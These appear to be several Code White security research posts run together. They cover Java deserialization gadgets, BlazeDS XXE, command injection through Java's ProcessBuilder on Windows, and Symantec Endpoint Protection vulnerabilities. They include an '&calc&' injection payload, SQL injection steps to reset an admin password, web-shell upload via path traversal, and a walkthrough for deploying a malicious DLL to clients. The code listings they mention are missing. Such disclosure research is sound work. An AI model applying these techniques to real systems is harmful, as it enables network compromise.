Of these 15 classes, those related to RMI stood out. That word alone should make you sit up. Especially sun.rmi.server.UnicastRef and sun.rmi.server.UnicastRef2 seemed interesting, as they reconstruct a sun.rmi.transport.LiveRef object via its sun.rmi.transport.LiveRef.read(ObjectInput, boolean) method. This method then reconstructs a sun.rmi.transport.tcp.TCPEndpoint and a local sun.rmi.transport.LiveRef and registers it at the sun.rmi.transport.DGCClient, the RMI distributed garbage collector client:
DGCClient implements the client-side of the RMI distributed garbage collection system.
The external interface to DGCClient is the "registerRefs" method. When a LiveRef to a remote object enters the VM, it needs to be registered with the DGCClient to participate in distributed garbage collection.
When the first LiveRef to a particular remote object is registered, a "dirty" call is made to the server-side distributed garbage collector for the remote object […]
So according to the documentation, the registration of our LiveRef results in the call for a remote object to the endpoint specified in our LiveRef? Sounds like RCE via RMI!
Tracing the call hierarchy of ObjectInputStream.readObject actually reveals that there is a path from an Externalizable.readExternal call via sun.rmi.server.UnicastRef/sun.rmi.server.UnicastRef2 to ObjectInputStream.readObject in sun.rmi.transport.StreamRemoteCall.executeCall().
So let's see what happens if we deserialize an AMF message with a sun.rmi.server.UnicastRef object using the following code utilizing Flex BlazeDS:
As a first proof of concept, we just start a listener with netcat and see if the connection gets established.
This technique has already been shown as a deserialization blacklist bypass by Jacob Baines in 2016, but I'm not sure if he was aware that it also turns any Externalizable.readExternal into an ObjectInputStream.readObject. He also presented a JRMP listener that sends a specified payload. Later, the JRMP listener has been added to ysoserial, which can deliver any available payload:
Applications using Adobe's/Apache's implementation should migrate to Apache's latest release version 4.7.3, that addresses this issue.
Exadel has discontinued its library, so there won't be any updates.
For GraniteDS and WebORB for Java, there is currently no response/solution.
Coincidentally, there is the JDK Enhancement Proposal JEP 290: Filter Incoming Serialization Data addressing the issue of Java deserialization vulnerabilities in general, which has already been implemented in the most recent JDK versions 6u141, 7u131, and 8u121.
[Update 08/05/2015: Added reference to CVE-2012-3213 of James Forshaw. Thanks for the heads up]
As already mentioned in our Infiltrate '16 and RuhrSec '16 talks, Code White spent some research time to look for serialization gadgets. Apart from the Javassist/Weld gadget we also found an old but interesting gadget, only using classes from the Java Runtime Environment (so called JRE gadget).
We called the gadget Return of the Rhino since the relevant gadget classes are part of the Javascript engine Rhino, bundled with Oracle JRE6 and JRE7.
As you may already know, the Rhino Script engine has already been abused in JVM sandbox escapes in the past (e.g. CVE-2011-3544 of Michael Schierl and CVE-2012-3213 of James Forshaw).
We stumbled over the gadget just by accident as we realized that there is a huge difference between the official Oracle JRE and the JRE's bundled in common Linux distros.
Most may not know that the Rhino Script Engine is actively developed by the Mozilla Project and distributed as a standalone package/jar (packages under org.mozilla.*). Furthermore, Oracle JRE6/7 is bundling an old fork of Rhino (packages under sun.org.mozilla.*). Surprisingly, Oracle applied some hardening to Rhino core classes with JRE7u1513, not being serializable anymore. The changes were made to fix a sandbox escape (CVE-2012-3213) of James Forshaw (see James' blog post).
But those hardening changes were not incorporated into Mozilla's Rhino mainline, which happens once in a while. So the gadget still works if you are using OpenJdk bundled with Ubuntu or Debian.
Let's take a look at the static view of some Rhino core classes:
In the Rhino Javascript domain almost every Javascript language object is represented as aScriptableObject in the Java domain.
Functions, Types, Regexes and several other Javascript objects are implemented in Java classes, extending ScriptableObject.
A ScriptableObject has two interesting members. A reference to its prototype object and an array of Slot objects. The slots store the properties of a Javascript object. The Slot can either be Slot, GetterSlot or RelinkedSlot. For our gadget we only focus on the GetterSlot inner class.
Every Slot class has a getValue() method used to retrieve the value of the property. In case of a GetterSlot the value is taken from a call to either a MemberBox or Function instance. And both MemberBox and Function instances do dynamic method calls using Java's Reflection API. That's already the essence of the story :-). But let's go into details.
The class NativeError is a successor of IdScriptableObject which inherits from ScriptableObject. ScriptableObject implements the tagging interface Serializable, hence all successors like NativeError are serializable. The class NativeError has an interesting way of how toString() is performed:
In the very beginning toString() just calls js_toSting(this).
And now we reach the point where it gets interesting. In the first line of js_toString(), a property called "name" is retrieved from the NativeError instance using the static method ScriptableObject.getProperty().
In ScriptableObject.getProperty() the property value is retrieved by calling the IdScriptableObject.get() method which delegates the property resolution call to its ancestor ScriptableObject.
ScriptableObject gets the value of the property from the Slot instance of the Slot[] by calling the getValue() method.
In case of a ScriptableObject$GetterSlot (inner class of ScriptableObject) we finally reach the code where reflection calls are eventually happening.
As already shown in the static class view, ScriptableObject$GetterSlot has a member "getter" of class Object. In the getValue() method of ScriptableObject$GetterSlot two cases are checked.
In case of getter being an instance of MemberBox, the invoke method on the MemberBox instance is called which just wraps a dynamic call using Java's Reflection API.
The Method object used in the reflection call comes from the member variable "memberObject" of class MemberBox. Although "memberObject" is of type java.lang.reflect.Member, only java.lang.reflect.Method or java.lang.reflect.Constructor instances are valid classes for "memberObject". Both java.lang.reflect.Method and java.lang.reflect.Constructor are not serializable, so obviously the value of "memberObject" needs to be set in the readObject() method of MemberBox during deserialization.
Specifically, "memberObject" is set in method readMember(), creating a java.lang.reflect.Method object using values coming from the serialized object stream.
So we can control the java.lang.reflect.Method object used in the reflection call. How about the instance ("getterThis") on which method gets invoked? Is this instance also created from the serialized object stream and hence under our control? If we look back into the implementation of method ScriptableObject$GetterSlot.getValue(), we see that the value of "getterThis" depends on the value of member "delegateTo" of the MemberBox instance. "delegateTo" is marked transient and is not set in readObject() during deserialization. So the first case of the if-statement applies and "getterThis" is assigned to "start" which is our NativeError instance. And the arguments of the reflection call are just set to an empty Object[]. Bad for us, but there's hope as we will see later.
Looking again at ScriptableObject$GetterSlot.getValue() we see a second case, if "getter" is an instance of Function. The interface Function sounds very interesting.
And we have plenty of classes implementing Function, most of them being serializable.
From all those classes the serializable NativeJavaMethod class nearly jumped into our face. Before we go into details, let's take another look at the static view of some Rhino core classes, taking the NativeJavaMethod into account.
And a quick look into the call() method revealed the following: In the beginning, the "index" variable is returned from the call to method findCachedFunction(). This method eventually calls findFunction() which calculates one MemberBox instance from the member "methods"(of type MemberBox[]) using a more or less complex algorithm. If the methods array has only one element, findCachedFunction() will just return 0 as the index value.
The variable "meth" is assigned to methods[0]. Just keep in mind that the member "methods" is under our control as it comes from the serialized object stream. At the very end of the figure we have a dynamic method invocation, as the method invoke() is called on the MethodBox instance "meth". So we can control the Method object/method to be invoked which is half the battle.
How about the target instance "javaObject". Can we control it?
We might be able to control it if "o" is an instance of Wrapper. Then, the unwrap() method on "o" is called and the return value assigned to "javaObject". "o" is assigned to "thisObject" which is our NativeError instance. NativeError is not of type Wrapper, but we can see a "for" loop which reassigns "o" to the prototype object of "o" using the getPrototype() method.
So if you can set the prototypeObject member of our NativeError instance to a Wrapper instance and get the unwrap() method to return an object under our control we are ready to go!
And the serializable class NativeJavaObject does what is needed here. It just returns the value of the member "javaObject" in its unwrap() method.
Another update to the static view of some Rhino core classes, taking NativeJavaObject into account.
So apperently the only thing we need to do is to create a NativeError instance, set its prototype to a NativeJavaObject which wraps our target instance, create a NativeJavaMethod and specify the method to be invoked on the target instance, serialize it and deserialize it again. But now we get the following exception:
Looks like we need a Context being associated with the current thread :-(
But hey! There is a static method Context.enter() which sets the Context we really need. We just need to trigger it in advance. But how to call Context.enter() if we can't use a MethodBox nor a NativeJavaMethod. To get around this, we use a trick we had known for a while:
When you do a reflection call, the target object is ignored, if the method to be invoked is a static method. That's it.
And if you look back, we already had found a call to invoke() on a MemberBox instance being triggered from method ScriptableObject$GetterSlot.getValue(). But the first argument was always our NativeError instance. As already mentioned, the first argument gets ignored if you use a static method such as Context.enter() as your target method :-).
So if we would have two property accesses on NativeError, we could then trigger a reflection call on Context.enter() using a MemberBox and then another reflection call using a NativeJavaMethod.
Luckily, we have two property accesses in method js_toString() of class NativeError:
The only remaining problem is how to trigger a toString() call on a NativeError object during deserialization. As you may have already seen in our Infiltrate '16 or RuhrSec '16 slidedecks you can use the "trampoline" class javax.management.BadAttributeValueExpException for that.
Getting code execution is trivial now. You can use Adam Gowdiak's technique and create a serializable com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl instance and invoke the newTransformer() method on it by using the reflection primitive of NativeJavaMethod. Or you just invoke the execute() method on a serializable com.sun.rowset.JdbcRowSetImpl instance and load a RMI class from your server (for further details see our Infiltrate '16 or RuhrSec '16 slidedecks).
The outcome of Code White's research efforts into Java deserialization vulnerabilities was presented at Infiltrate 2016 by Matthias Kaiser.
The talk gave an introduction into finding and exploiting Java deserialization vulnerabilities. Technical details about the Oracle Weblogic deserialization RCE (CVE-2015-4852) and a SAP Netweaver AS Java 0day were shown.
The slidedeck doesn't include the SAP Netweaver AS Java 0day POC and it won't be published until fixed.
Unfortunately, in older versions of SEP, namely the versions 11.x, some of the flawed features of 12.x weren’t even implemented, e. g., the password reset feature. However, SEP 11.x has other vulnerabilities that can have in the same impact.
Vulnerabilities in Symantec Endpoint Protection 11.x
The following vulnerabilities have been discovered in Symantec Endpoint Protection 11.x:
SEP Manager
SQL Injection
Allows the execution of arbitrary SQL on the SQL Server by unauthenticated users.
Command Injection
Allows the execution of arbitrary commands with 'NT Authority\SYSTEM' privileges by users with write acceess to the database, e. g., via the before-mentioned SQL injection.
SEP Client
Binary Planting
Allows the execution of arbitrary code with 'NT Authority\SYSTEM' privileges on SEP clients running Windows by local users.
The AgentRegister operation of the AgentServlet is vulnerable to SQL injections within the HardwareKey attribute:
To reach that point, we need to provide a valid DomainID, which can be retrieved from a SEP client installation from the SyLink.xml file located in C:\ProgramData\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Config.
Exploiting this vulnerability is a little more complicated. For example, changing a SEPM administrator user’s password requires the manipulation of a configuration stored as an XML document in the database.
The administrative users are stored in the SemConfigRoot document in the basic_metadata table with the hard-coded ID B655E64D0A320801000000E164041B79. An administrator entry might look like this:
The complicated part is that this configuration document is crucial for the whole SEPM. Any changes resulting in an invalid XML document result in a denial of service. That’s why it’s important that any change results in a valid document as well.
So how can we modify that document to our advantages?
The stored PasswordHash is simply the MD5 of the password in hexadecimal representation. So replacing that attribute value with a new one would allow us to login with that password.
But we neither know the current PasswordHash value (obviously!) nor any other attribute value that we can use as an anchor point for the string manipulate.
However, we know other parts of the SemAdministrator element that we can use. For example, if we replace ' PasswordHash=' by ' PasswordHash="[…]" OldPasswordHash=', we can set our own PasswordHash value while being able to reverse the operation by replacing ' PasswordHash="[…]" OldPasswordHash=' by ' PasswordHash=':
Here we first do the reverse operation in line 14 before updating the PasswordHash value with ours in line 15 to avoid accidentally creating an invalid document in the case the update is executed multiple times.
There may also be other attributes that needs to be modified like the Name or AuthenticationMethod for local instead of RSA SecureId or Directory authentication.
The reset would be just doing the reverse operation on the XML document:
Now we can log into the SEPM and could exploit CVE-2015-1490 to upload arbitrary files to the SEPM server, resulting in the execution of arbitrary code with 'NT Authority\SYSTEM' privileges.
If changing the admin password does not work for some reasons, you can also use the SQL injection to exploit the command injection described next.
Command Injection
From the previous blog post on Java and Command Line Injections in Windows we know that injecting additional arguments and even commands may be possible in Java applications on Windows, even when ProcessBuilder is utilized.
SEPM does create processes only in a few locations but even less seem promising and can be triggered. The SecurityAlertNotifyTask class is one of them, which processes security alerts from the database, which we can modify with the SQL injection.
The notification tasks are stored in the notification table. For manipulating the command line, we need to reach the doRunExecutable(String) method. This happens if the notification.email contains batchfile. The executable to call is taken from notification.batch_file_name. However, only existing files from the C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\bin directory can be specified.
The next problem is to find a way to manipulate arguments used in the building of the command line. The only additional argument passed is the parameter of the doRunExecutable method. Unfortunately, the values passed are notification messages originating from a properties file and most of them are parameterized with integers only.
However, the notification message for a new virus is parameterized with the name of the new virus, which originates from the database as well. So if we register a new virus with our command line injection payload as the virus name and register a new security alert notification, the given batch file would be called with the predefined notification message containing the command line injection. And since .bat files are silently started in a cmd.exe shell environment, it should be easy to get a calc.
The following SQL statements set up the mentioned security alert notification scenario:
"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\bin\dbtools.bat" "New risk found: "&calc&"."
And there we have a calc.
SEP Client
Binary Planting
The Symantec AntiVirus service process Rtvscan.exe of the SEP client is vulnerable to Binary Planting, which can be exploited for local privilege escalation. During the collection of version information of installed engines and definitions, the process is looking for a SyKnAppS.dll in C:\ProgramData\Symantec\SyKnAppS\Updates and loading it if present. This directory is writable by members of the built-in Users group:
The version information collection can be triggered in the SEP client GUI via Help and Support, Troubleshooting..., then Versions. To exploit it, we place our DLL into the C:\ProgramData\Symantec\SyKnAppS\Updates directory. But before that, we need to place the original SyKnAppS.dll from the parent directory in there and trigger the version information collection once as SEP does some verification of the DLL before loading but only once and not each time:
Everyone knows that incorporating user provided fragments into a command line is dangerous and may lead to command injection. That’s why in Java many suggest using ProcessBuilder instead where the program’s arguments are supposed to be passed discretely in separate strings.
However, in Windows, processes are created with a single command line string. And since there are different and seemingly confusing parsing rules for different runtime environments, proper quoting seems to be likewise complicated.
This makes Java for Windows still vulnerable to injection of additional arguments and even commands into the command line.
Windows’ CreateProcess Command Lines
In Windows, the main function for creating processes is the CreateProcess function. And in contrast to C API functions like execve, arguments are not passed separately as an array of strings but in a single command line. On the other side, the entry point function WinMain expects a single command line argument as well.
This already produces different and frankly surprising results in some cases:
The last two are remarkable as one additional quotation mark swaps the results of argv and CommandLineToArgvW.
Java’s Command Line Generation in Windows
With the knowledge of how CreateProcess expects the command line arguments to be quoted, let’s see how Java builds the command line and quotes the arguments for Windows.
If a process is started using ProcessBuilder, the arguments are passed to the static method start of ProcessImpl, which is a platform-dependent class. In the Windows implementation of ProcessImpl, the start method calls the private constructor of ProcessImpl, which creates the command line for the CreateProcess call.
In the private constructor of ProcessImpl, there are two operational modes: the legacy mode and the strict mode. These are the result of issues caused by changes to Runtime.exec. The legacy mode is only performed if there is no SecurityManager present and the property jdk.lang.Process.allowAmbiguousCommands is not set to false.
The Legacy Mode
In the legacy mode, the first argument (i. e., the program to execute) is quoted if required and then the command line is created using createCommandLine.
The needsEscaping method checks whether the value is already quoted using isQuoted or wraps it in double quotes if it contains certain characters.
The vertification type VERIFICATION_LEGACY passed to needsEscaping makes noQuotesInside in isQuoted being false, which would allow quotation marks within the path. It also makes needsEscaping test for space and tabulator characters only.
But let’s take a look at the createCommandLine method, which creates the command line:
Again, with the verification type VERIFICATION_LEGACY the needsEscaping method only returns true if it is already wrapped in quotes (regardless of any quotes within the string) or if it is not wrapped in quotes and contains a space or tabulator character (again, regardless of any quotes within the string). If it needs quoting, it is simply wrapped in quotes and a possible trailing backslash is doubled.
Ok, so far, so good. Now let’s recall Daniel Colascione’s conclusion:
Do not:
Simply add quotes around command line argument arguments without any further processing.
[…]
Yes, exactly. This can be exploited to inject additional arguments:
A value that is considered to be quoted:
passed argument value: "arg 1" "arg 2" "arg 3"
quoted argument value: no quoting needed as it’s “already quoted”
In the strict mode, things are a little different.
If the path contains a quote, getExecutablePath throws an exception and the catch block is executed where getTokensFromCommand tries to extract the path.
However, the rather interesting part is that createCommandLine is called with a different verification type based on whether isShellFile denotes it as a shell file.
But I’ll come back to that later.
With the verification type VERIFICATION_WIN32, noQuotesInside is still false and both injection examples mentioned above work as well.
However, if needsEscaping is called with the verification type VERIFICATION_CMD_BAT, noQuotesInside becomes true. And without being able to inject a quote we can’t escape the quoted argument.
CreateProcess’ Silent cmd.exe Promotion
Remember the isShellFile checked the file name extension for .cmd and .bat? This is due to the fact that CreateProcess executes these files in a cmd.exe shell environment:
[…] the decision tree that CreateProcess goes through to run an image is as follows:
[…]
If the file to run has a .bat or .cmd extension, the image to be run becomes Cmd.exe, the Windows command prompt, and CreateProcess restarts at Stage 1. (The name of the batch file is passed as the first parameter to Cmd.exe.)
That means a 'file.bat …' becomes 'C:\Windows\system32\cmd.exe /c "file.bat …"' and an additional set of quoting rules would need to be applied to avoid command injection in the command line interpreted by cmd.exe.
However, since Java does no additional quoting for this implicit cmd.exe call promotion on the passed arguments, injection is even easier: &calc& does not require any quoting and will be interpreted as a separate command by cmd.exe.
This works in the legacy mode just like in the strict mode if we make isShellFile return false, e. g., by adding whitespace to the end of the path, which tricks the endsWith check but are ignored by CreateProcess.
Conclusion
Command line parsing in Windows is not consistent and therefore the implementation of proper quoting of command line argument even less. This may allow the injection of additional arguments.
Additionally, since CreateProcess implicitly starts .bat and .cmd in a cmd.exe shell environment, even command injection may be possible.
As a sample, Java for Windows fails to properly quote command line arguments. Even with ProcessBuilder where arguments are passed as a list of strings:
Argument injection is possible by providing an argument containing further quoted arguments, e. g., '"arg 1" "arg 2" "arg 3"'.
On cmd.exe process command lines, a simple '&calc&' alone suffices.
Only within the most strictly mode, the VERIFICATION_CMD_BAT verification type, injection is not possible:
Legacy mode:
VERIFICATION_LEGACY: There is no SecurityManager present and jdk.lang.Process.allowAmbiguousCommands is not explicitly set to false (no default set)
allows argument injection
allows command injection in cmd.exe calls (explicit or implicit)
Strict mode:
VERIFICATION_CMD_BAT: Most strictly mode, file ends with .bat or .cmd
does not allow argument injection
does not allow command injection in cmd.exe calls
VERIFICATION_WIN32: File does not end with .bat or .cmd
allows argument injection
allows command injection in cmd.exe calls (explicit or implicit)
However, Java’s check for switching to the VERIFICATION_CMD_BAT mode can be circumvented by adding whitespace after the .bat or .cmd.
In a recent Product Security Review, Code White Researchers discovered a XXE vulnerability in Apache Flex BlazeDS/Adobe (see ASF Advisory).
The vulnerable code can be found in the BlazeDS Remoting/AMF protocol implementation.
All versions before 4.7.1 are vulnerable.
Software products providing BlazeDS Remoting destinations might be also affected by the vulnerability (e.g. Adobe LiveCycle Data Services, see APSB15-20).
Vulnerability Details
An AMF message has a header and a body. To parse the body, the method readBody() of AmfMessageDeserializer is called.
In this method, the targetURI, responseURI and the length of the body are read. Afterwards, the method readObject() is called which
eventually calls the method readObject() of an ActionMessageInput instance (either Amf0Input or Amf3Input).
In case of an Amf0Input instance, the type of the object is read from the next byte. If type has the value 15, the following bytes of the body are parsed in method
readXml() as a UTF string.
The xml string gets passed to method stringToDocument of class XMLUtil where the Document is created using the DocumentBuilder.
When a DocumentBuilder is created through the DocumentBuilderFactory, external entities are allowed by default.
The developer needs to configure the parser to prevent XXE.
Exploitation
Exploitation is easy, just send the XXE vector of your choice.
In a recent research project, Markus Wulftange of Code White discovered several critical vulnerabilities in the Symantec Endpoint Protection (SEP) suite 12.1, affecting versions prior to 12.1 RU6 MP1 (see SYM15-007).
As with any centralized enterprise management solution, compromising a management server is quite attractive for an attacker, as it generally allows some kind of control over its managed clients. Taking control of the manager can yield a takeover of the whole enterprise network.
In this post, we will take a closer look at some of the discovered vulnerabilities in detail and demonstrate their exploitation. In combination, they effectively allow an unauthenticated attacker the execution of arbitrary commands with 'NT Authority\SYSTEM' privileges on both the SEP Manager (SEPM) server, as well as on SEP clients running Windows. That can result in the full compromise of a whole corporate network.
Vulnerabilities in Symantec Endpoint Protection 12.1
Code White discovered the following vulnerabilities in Symantec Endpoint Protection 12.1:
Allows the execution of arbitrary code with 'NT Authority\SYSTEM' privileges on SEP clients running Windows
The objective of our research was to find a direct way to take over a whole Windows domain and thus aimed at a full compromise of the SEPM server and the SEP clients running on Windows. Executing post exploitation techniques, like lateral movement, would be the next step if the domain controller hasn't already been compromised by this.
Therefore, we focused on SEPM's Remote Java or Web Console, which is probably the most exposed interface (accessible via TCP ports 8443 and 9090) and offers most of the functionalities of SEPM's remote interfaces. There are further entry points, which may also be vulnerable and exploitable to gain access to SEPM, its server, or the SEP clients. For example, SEP clients for Mac and Linux may also be vulnerable to Binary Planting.
Attack Vector and Exploitation
A full compromise of the SEPM server and SEP clients running Windows was possible through the following steps:
Gaining administrative access to the SEP Manager (CVE-2015-1486)
Full compromise of SEP Manager server (CVE-2015-1487 and CVE-2015-1489)
Full compromise of SEP clients running Windows (CVE-2015-1492)
CVE-2015-1486: SEPM Authentication Bypass
SEPM uses sessions after the initial authentication. User information is stored in a AdminCredential object, which is associated to the user's session. Assigning the AdminCredential object to a session is implemented in the setAdminCredential method of ConsoleSession, which again holds an HttpSession object.
This setAdminCredential method is only called at two points within the whole application: once in the LoginHandler and once in the ResetPasswordHandler.
Its purpose in LoginHandler is obvious. But why is it used in the ResetPasswordHandler? Let's have a look at it!
Password reset requests are handled by the ResetPasswordHandler handler class. The implementation of the handleRequest method of this handler class can be observed in the following listing:
After the prologue in lines 72-84, the call to the init method calls the findAdminEmail method for looking up the recipient's e-mail address.
Next, the getCredential method is called in line 92 to retrieve the AdminCredential object of the corresponding administrator. The AdminCredential object holds information on the administrator, e. g., if it's a system administrator or a domain administrator as well as an instance of the SemAdministrator class, which finally holds information such as the name, e-mail address, and hashed password of the administrator.
The implementation of the getCredential method can be seen in the following listing:
Line 367 creates a new session, which effectively results in issuing a new JSESSIONID cookie to the client. In line 368, the doGetAdminCredentialWithoutAuthentication method is called to get the AdminCredential object without any authentication based on the provided UserID and Domain parameters.
Finally – and fatally –, the looked up AdminCredential object is associated to the newly created session in line 369, making it a valid and authentic administrator's session. This very session is then handed back to the user who requested the password reset. So by requesting a password reset, you'll also get an authenticated administrator's session!
An example of what a request for a password reset for the built-in system administrator 'admin' might look like can be seen in the following listing:
And the response to the request:
The response contains the JSESSIONID cookie of the newly created session with the admin's AdminCredential object associated to it.
Note that this session cannot be used with the Web console as it is missing some attribute required for AjaxSwing. However, it can be used to communicate with the other APIs like the SPC web services, which, for example, allows creating a new SEPM administrator.
CVE-2015-1487: SEPM Arbitrary File Write
The UploadPackage action of the BinaryFile handler is vulnerable to path traversal, which allows arbitrary files to be written. It is implemented by the BinaryFileHandler handler class. Its handleRequest method handles the requests and the implementation can be observed in the following listing:
Handling of the UploadPackage action starts at line 189. The PackageFile parameter value is used as file name and the KnownHosts parameter value as directory name. Interestingly, the provided directory name is checked for path traversal by looking for directory separators '/' and '\' (see line 196, possibly related to CVE-2014-3439). However, the file name is not, which still allows to specify any arbitrary file location.
The following request results in writing the given POST request body data to the file located at '[…]\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\exec.jsp':
Writing a JSP web shell as shown allows the execution of arbitrary OS commands with 'NT Service\semsrv' privileges.
CVE-2015-1489: SEPM Privilege Escalation
The Symantec Endpoint Protection Launcher executable SemLaunchSvc.exe is running as a service on the SEPM server with 'NT Authority\SYSTEM' privileges. It is used to launch processes that require elevated privileges (e. g., LiveUpdate, ClientRemote, etc.). The service is listening on the loopback port 8447 and SEPM communicates with the service via encrypted messages. The communication endpoint in SEPM is the SemLaunchService class. One of the supported tasks is the CommonCMD, which results in command line parameters of a cmd.exe call.
Since we are able to execute arbitrary Java code within SEPM's web server context, we can effectively execute commands with 'NT Authority\SYSTEM' privileges on the SEPM server.
CVE-2015-1492: SEP Client Binary Planting
The client deployment process on Windows clients is vulnerable to Binary Planting. It is an attack exploiting the behavior of how Windows searches for files of dynamically loaded libraries when loading them via LoadLibrary only by their name. If it is possible for an attacker to place a custom DLL in one of the locations the DLL is searched in, it is possible to execute arbitrary code with the DllMain entry point function, which gets executed automatically on load.
Symantec Endpoint Protection is vulnerable to this flaw: During the installation of a deployment package on a Windows client, the SEP client service ccSvcHst.exe starts the smcinst.exe from the installation package as a service. This service tries to load several DLLs, e. g., the UxTheme.dll.
By deploying a specially crafted client installation package with a custom DLL, it is possible to execute arbitrary code with 'NT Authority\SYSTEM' privileges.
A custom installation package containing a custom DLL can be constructed and deployed in SEPM with the following steps.
Export Package
Download an existing client installation package for Windows as a template:
Go to 'Admin', 'Installation Packages'.
Select a directory where you want to export it to.
Select one of the existing packages for Windows and click on 'Export a Client Installation Package'.
Untick the 'Create a single .EXE file for this package'.
Untick the 'Export packages with policies from the following groups'.
Click 'OK'.
Modify Package
Tamper with the client installation package template:
Within the downloaded installation package files, delete the packlist.xml file.
Open the setAid.ini file, delete the PackageChecksum line and increase the values of ServerVersion
and ClientVersion to something like 12.2.0000 instead of 12.1.5337.
Open the Setup.ini file and increase the ProductVersion value accordingly.
Copy the custom DLL into the package directory and rename it UxTheme.dll.
Import and deploy Package
Create a new client installation package from the tampered files and deploy it to the clients:
Go to 'Admin', 'Installation Packages'.
Click 'Add a Client Installation Package'.
Give it a name, select the directory of the tampered client installation package files, and upload it.
Click 'Upgrade Clients with Package'.
Choose the newly created client installation package and the group it should be deployed to.
Open the 'Upgrade Settings', untick 'Maintain existing client features when upgrading' and select the default
feature set for the target group, e. g., 'Full Protection for Clients'.
Upgrade the clients by clicking 'Next'.
The loading of the planted binary may take some while, probably due to some scheduling of the smcinst.exe service.
Conclusion
We have successfully demonstrated that a centralized enterprise management solution like the Symantec Endpoint Protection suite is a critical asset in a corporate network as unauthorized access to the manager can have unforeseen influence on the managed clients. In this case, an exposed Symantec Endpoint Protection Manager can result in the full compromise of a whole corporate domain.